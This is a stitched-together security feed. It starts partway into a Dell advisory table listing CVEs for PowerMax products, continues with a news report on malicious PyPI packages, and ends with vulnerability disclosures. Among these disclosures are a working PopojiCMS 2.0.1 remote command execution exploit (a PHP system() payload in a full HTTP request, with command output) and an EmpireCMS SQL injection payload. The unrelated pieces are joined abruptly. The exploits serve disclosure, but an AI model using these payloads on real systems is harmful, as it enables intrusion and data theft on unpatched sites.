CVE-2023-36724, CVE-2023-36434, CVE-2023-36576, CVE-2023-36598, CVE-2023-36731, CVE-2023-36557, CVE-2023-36563, CVE-2023-36721, CVE-2023-44487, CVE-2023-36602, CVE-2023-36725, CVE-2023-36436, CVE-2023-36438, CVE-2023-36720, CVE-2023-36431, CVE-2023-36570, CVE-2023-36722, CVE-2023-36723, CVE-2023-36726, CVE-2023-36732, CVE-2023-41773, CVE-2023-41772, CVE-2023-41771, CVE-2023-41770, CVE-2023-41768, CVE-2023-41767, CVE-2023-36743, CVE-2023-36776, CVE-2023-38166, CVE-2023-36902, CVE-2023-35349, CVE-2023-36564, CVE-2023-36567, CVE-2023-36571, CVE-2023-36572, CVE-2023-36573, CVE-2023-36574, CVE-2023-36575, CVE-2023-36577, CVE-2023-36578, CVE-2023-36579, CVE-2023-36581, CVE-2023-36582, CVE-2023-36583, CVE-2023-36584, CVE-2023-36585, CVE-2023-36589, CVE-2023-36590, CVE-2023-36591, CVE-2023-36592, CVE-2023-36593, CVE-2023-36594, CVE-2023-36596, CVE-2023-36603, CVE-2023-36605, CVE-2023-36606, CVE-2023-36697, CVE-2023-36698, CVE-2023-36701, CVE-2023-36702, CVE-2023-36704, CVE-2023-36709, CVE-2023-36710, CVE-2023-36711, CVE-2023-36712, CVE-2023-36713, CVE-2023-36729, CVE-2023-41774, CVE-2023-41769, CVE-2023-41766, CVE-2023-41765, CVE-2023-38159, CVE-2023-36794, CVE-2023-36792, CVE-2023-36796, CVE-2023-36788, CVE-2023-36793, CVE-2023-36803, CVE-2023-38142, CVE-2023-38160, CVE-2023-38161, CVE-2023-36802, CVE-2023-36804, CVE-2023-36805, CVE-2023-38139, CVE-2023-38140, CVE-2023-38141, CVE-2023-38143, CVE-2023-38144, CVE-2023-38147, CVE-2023-38149, CVE-2023-35355, CVE-2023-36899, CVE-2023-36873, CVE-2023-38172, CVE-2023-38184, CVE-2023-35387, CVE-2023-35386, CVE-2023-35385, CVE-2023-35384, CVE-2023-35383, CVE-2023-35380, CVE-2023-35378, CVE-2023-35377, CVE-2023-38254, CVE-2023-36913, CVE-2023-36911, CVE-2023-36907, CVE-2023-36889

PowerMaxOS 5978

PowerMax OS

Version 5978

Version 5978.714.714 Patch 10120

Contact customer support and request DSA-2023-443  
https://www.dell.com/support/incidents-online

**CVEs Addressed**

**Product**

**Software/Firmware**

**Affected Versions**

**Remediated Versions**

**Link**

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025

Unisphere for PowerMax

Host Installation

Versions prior to 9.2.4.7

Version 9.2.4.7

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025, CVE-2023-38545, CVE-2023-48660, CVE-2023-48661, CVE-2023-48662, CVE-2023-48663, CVE-2023-48664, CVE-2023-48665, CVE-2023-48671

Unisphere for PowerMax Virtual Appliance

Virtual Appliance

Versions prior to 9.2.4.7

Version 9.2.4.7

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025

Unisphere 360

Host Installation

Versions prior to 9.2.4.11

Version 9.2.4.11

https://www.dell.com/support/home/product-support/product/unisphere-360/drivers

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025, CVE-2023-38545, CVE-2023-48660, CVE-2023-48661, CVE-2023-48662, CVE-2023-48663, CVE-2023-48664, CVE-2023-48665, CVE-2023-48671

Solutions Enabler Virtual Appliance

Virtual Appliance

Versions prior to 9.2.4.5

Version 9.2.4.5

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

CVE-2016-3709, CVE-2018-7738, CVE-2018-9234, CVE-2020-22218, CVE-2020-36766, CVE-2022-36402, CVE-2022-40982, CVE-2022-48565, CVE-2022-48566, CVE-2023-0394, CVE-2023-0459, CVE-2023-1192, CVE-2023-1206, CVE-2023-1859, CVE-2023-1981, CVE-2023-2007, CVE-2023-20197, CVE-2023-20569, CVE-2023-20588, CVE-2023-20593, CVE-2023-28484, CVE-2023-28736, CVE-2023-28938, CVE-2023-29469, CVE-2023-2985, CVE-2023-32182, CVE-2023-32360, CVE-2023-3341, CVE-2023-34241, CVE-2023-34319, CVE-2023-3446, CVE-2023-34969, CVE-2023-35001, CVE-2023-3567, CVE-2023-35945, CVE-2023-36054, CVE-2023-3609, CVE-2023-3611, CVE-2023-3772, CVE-2023-3776, CVE-2023-3812, CVE-2023-3817, CVE-2023-38408, CVE-2023-38559, CVE-2023-3863, CVE-2023-39192, CVE-2023-39193, CVE-2023-39194, CVE-2023-39615, CVE-2023-4016, CVE-2023-40217, CVE-2023-40283, CVE-2023-4128, CVE-2023-4132, CVE-2023-4133, CVE-2023-4134, CVE-2023-4156, CVE-2023-4194, CVE-2023-42754, CVE-2023-43115, CVE-2023-43785, CVE-2023-43786, CVE-2023-43787, CVE-2023-4385, CVE-2023-4387, CVE-2023-4459, CVE-2023-4504, CVE-2023-4622, CVE-2023-4623, CVE-2023-4641, CVE-2023-4692, CVE-2023-4693, CVE-2023-4881, CVE-2023-4921, CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025, CVE-2023-38545, CVE-2023-48660, CVE-2023-48661, CVE-2023-48662, CVE-2023-48663, CVE-2023-48664, CVE-2023-48665, CVE-2023-48671

Dell PowerMax EEM

Embedded Management

Version 5978

Version 5978.714.714 Patch 10120

Contact customer support and request DSA-2023-443  
https://www.dell.com/support/incidents-online

CVE-2023-36724, CVE-2023-36434, CVE-2023-36576, CVE-2023-36598, CVE-2023-36731, CVE-2023-36557, CVE-2023-36563, CVE-2023-36721, CVE-2023-44487, CVE-2023-36602, CVE-2023-36725, CVE-2023-36436, CVE-2023-36438, CVE-2023-36720, CVE-2023-36431, CVE-2023-36570, CVE-2023-36722, CVE-2023-36723, CVE-2023-36726, CVE-2023-36732, CVE-2023-41773, CVE-2023-41772, CVE-2023-41771, CVE-2023-41770, CVE-2023-41768, CVE-2023-41767, CVE-2023-36743, CVE-2023-36776, CVE-2023-38166, CVE-2023-36902, CVE-2023-35349, CVE-2023-36564, CVE-2023-36567, CVE-2023-36571, CVE-2023-36572, CVE-2023-36573, CVE-2023-36574, CVE-2023-36575, CVE-2023-36577, CVE-2023-36578, CVE-2023-36579, CVE-2023-36581, CVE-2023-36582, CVE-2023-36583, CVE-2023-36584, CVE-2023-36585, CVE-2023-36589, CVE-2023-36590, CVE-2023-36591, CVE-2023-36592, CVE-2023-36593, CVE-2023-36594, CVE-2023-36596, CVE-2023-36603, CVE-2023-36605, CVE-2023-36606, CVE-2023-36697, CVE-2023-36698, CVE-2023-36701, CVE-2023-36702, CVE-2023-36704, CVE-2023-36709, CVE-2023-36710, CVE-2023-36711, CVE-2023-36712, CVE-2023-36713, CVE-2023-36729, CVE-2023-41774, CVE-2023-41769, CVE-2023-41766, CVE-2023-41765, CVE-2023-38159, CVE-2023-36794, CVE-2023-36792, CVE-2023-36796, CVE-2023-36788, CVE-2023-36793, CVE-2023-36803, CVE-2023-38142, CVE-2023-38160, CVE-2023-38161, CVE-2023-36802, CVE-2023-36804, CVE-2023-36805, CVE-2023-38139, CVE-2023-38140, CVE-2023-38141, CVE-2023-38143, CVE-2023-38144, CVE-2023-38147, CVE-2023-38149, CVE-2023-35355, CVE-2023-36899, CVE-2023-36873, CVE-2023-38172, CVE-2023-38184, CVE-2023-35387, CVE-2023-35386, CVE-2023-35385, CVE-2023-35384, CVE-2023-35383, CVE-2023-35380, CVE-2023-35378, CVE-2023-35377, CVE-2023-38254, CVE-2023-36913, CVE-2023-36911, CVE-2023-36907, CVE-2023-36889

PowerMaxOS 5978

PowerMax OS

Version 5978

Version 5978.714.714 Patch 10120

Contact customer support and request DSA-2023-443  
https://www.dell.com/support/incidents-online

**Acknowledgements**

CVE-2023-48660, CVE-2023-48661, CVE-2023-48662, CVE-2023-48663, CVE-2023-48664, CVE-2023-48665, CVE-2023-48671: Dell Technologies would like to thank 33a6099 for reporting these issues.   
 

**Revision History**

**Revision**

**Date**

**Description**

1.0

2023-12-13

Initial Version

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Article Properties**

**Affected Product**

PowerMaxOS 5978, Solutions Enabler, Unisphere 360, Unisphere for PowerMax

**Last Published Date**

13 Dec 2023

**Version**

1

**Article Type**

Dell Security Advisory

CVE-2023-48660: DSA-2023-443: Dell PowerMaxOS 5978, Dell Unisphere 360, Dell Unisphere for PowerMax, Dell Unisphere for PowerMax Virtual Appliance, Dell Solutions Enabler Virtual Appliance, and Dell PowerMax EEM Secu

Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor.
"In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene

Malware / Supply Chain Attack

Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor.

"In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week.

The packages are estimated to have been downloaded over 10,000 times since May 2023.

The threat actors behind the activity have been observed using three techniques to bundle malicious code into Python packages, namely via a test.py script, embedding PowerShell in setup.py file, and incorporating it in obfuscated form in the \_\_init\_\_.py file.

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

Irrespective of the method used, the end goal of the campaign is to compromise the targeted host with malware, primarily a backdoor capable of remote command execution, data exfiltration, and taking screenshots. The backdoor module is implemented in Python for Windows and in Go for Linux.

Alternately, the attack chains also culminate in the deployment of W4SP Stealer or a clipper malware designed to keep close tabs on a victim's clipboard activity and swapping the original wallet address, if present, with an attacker-controlled address.

The development is the latest in a wave of compromised Python packages attackers have released to poison the open-source ecosystem and distribute a medley of malware for supply chain attacks.

It's also the newest addition to a steady stream of bogus PyPI packages that have acted as a stealthy channel for distributing stealer malware. In May 2023, ESET revealed another cluster of libraries that were engineered to propagate Sordeal Stealer, which borrows its features from W4SP Stealer.

Then, last month, malicious packages masquerading as seemingly innocuous obfuscation tools were found to deploy a stealer malware codenamed BlazeStealer.

"Python developers should thoroughly vet the code they download, especially checking for these techniques, before installing it on their systems," the researchers cautioned.

The disclosure also follows the discovery of npm packages that were found targeting an unnamed financial institution as part of an "advanced adversary simulation exercise." The names of the modules, which contained an encrypted blob, have been withheld to protect the identity of the organization.

"This decrypted payload contains an embedded binary that cleverly exfiltrates user credentials to a Microsoft Teams webhook that is internal to the target company in question," software supply chain security firm Phylum disclosed last week.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems

PopojiCMS version 2.0.1 is vulnerable to remote command execution in the Meta Social field.

    # Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution# Date: 27/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.popojicms.org/# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS##POC:1 ) Login with admin cred and click settings2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1Host: demos5.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=settingContent-Type: application/x-www-form-urlencodedContent-Length: 58Origin: https://demos5.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closemeta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3EResult: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

CVE-2023-50011: PopojiCMS 2.0.1 Remote Command Execution ≈ Packet Storm

EmpireCMS v7.5 was discovered to contain a SQL injection vulnerability via the ftppassword parameter at SetEnews.php.

**Brief of this vulnerability**  
EmpireCMS v7.5 has an SQL injection vulnerability when configuring FTP passwords

**Test Environment**  
Windows10  
PHP 5.4.45+Apache/2.4.39

**Affect version**  
EmpireCMS 7.5

**Vulnerable Code**  
e\\admin\\SetEnews.php line 353

  

**Vulnerability display**  
First enter the background

Click to add and capture the packet  

Modify parameters  
payload：ftppassword=test'+and+(updatexml(1,concat(0x3a,(database())),1))+and'  

Successfully obtained the database name

CVE-2023-50073: EmpireCMS v7.5 SetEnews.php has sql injection vulnerability · Issue #7 · leadscloud/EmpireCMS

Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 36943.

Tag

#windows